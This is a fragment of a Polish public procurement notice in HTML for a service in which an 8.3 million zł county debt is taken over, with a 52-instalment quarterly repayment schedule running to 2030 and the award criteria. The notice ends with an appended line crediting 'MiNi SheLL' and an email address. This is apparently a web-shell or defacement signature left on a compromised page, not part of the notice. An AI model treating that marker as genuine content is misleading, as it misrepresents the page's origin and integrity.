<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2: Przedmiotem zamówienia jest usługa sfinansowania zobowiązań Powiatu poprzez przejęcie długu w kwocie 8 300 000,00 zł (słownie: osiem milionów trzysta tysięcy złotych, 00/100) (art. 518 § 1 pkt 3 Kodeksu cywilnego). Spłata przejętego zobowiązania nastąpi w 52 kwartalnych ratach płatnych w terminie od 31 marca 2018 r. do 31 grudnia 2030 r. zgodnie z poniższym harmonogramem (w przypadku zmniejszenia kwoty przejętych wierzytelności harmonogram zostanie dopasowany poprzez pomniejszenie kolejnych rat, począwszy od ostatniej):
L.P.	DATA	Kwota [zł]
1	31.03.2018	30 000,00
2	30.06.2018	30 000,00
3	30.09.2018	30 000,00
4	31.12.2018	30 000,00
5	31.03.2019	45 000,00
6	30.06.2019	45 000,00
7	30.09.2019	45 000,00
8	31.12.2019	45 000,00
9	31.03.2020	75 000,00
10	30.06.2020	75 000,00
11	30.09.2020	75 000,00
12	31.12.2020	75 000,00
13	31.03.2021	87 500,00
14	30.06.2021	87 500,00
15	30.09.2021	87 500,00
16	31.12.2021	87 500,00
17	31.03.2022	125 000,00
18	30.06.2022	125 000,00
19	30.09.2022	125 000,00
20	31.12.2022	125 000,00
21	31.03.2023	162 500,00
22	30.06.2023	162 500,00
23	30.09.2023	162 500,00
24	31.12.2023	162 500,00
25	31.03.2024	175 000,00
26	30.06.2024	175 000,00
27	30.09.2024	175 000,00
28	31.12.2024	175 000,00
29	31.03.2025	200 000,00
30	30.06.2025	200 000,00
31	30.09.2025	200 000,00
32	31.12.2025	200 000,00
33	31.03.2026	225 000,00
34	30.06.2026	225 000,00
35	30.09.2026	225 000,00
36	31.12.2026	225 000,00
37	31.03.2027	225 000,00
38	30.06.2027	225 000,00
39	30.09.2027	225 000,00
40	31.12.2027	225 000,00
41	31.03.2028	225 000,00
42	30.06.2028	225 000,00
43	30.09.2028	225 000,00
44	31.12.2028	225 000,00
45	31.03.2029	250 000,00
46	30.06.2029	250 000,00
47	30.09.2029	250 000,00
48	31.12.2029	250 000,00
49	31.03.2030	250 000,00
50	30.06.2030	250 000,00
51	30.09.2030	250 000,00
52	31.12.2030	250 000,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2030.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Możliwość wydłużenia okresu spłaty zobowiązania maksymalnie o kolejne 3 lata - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com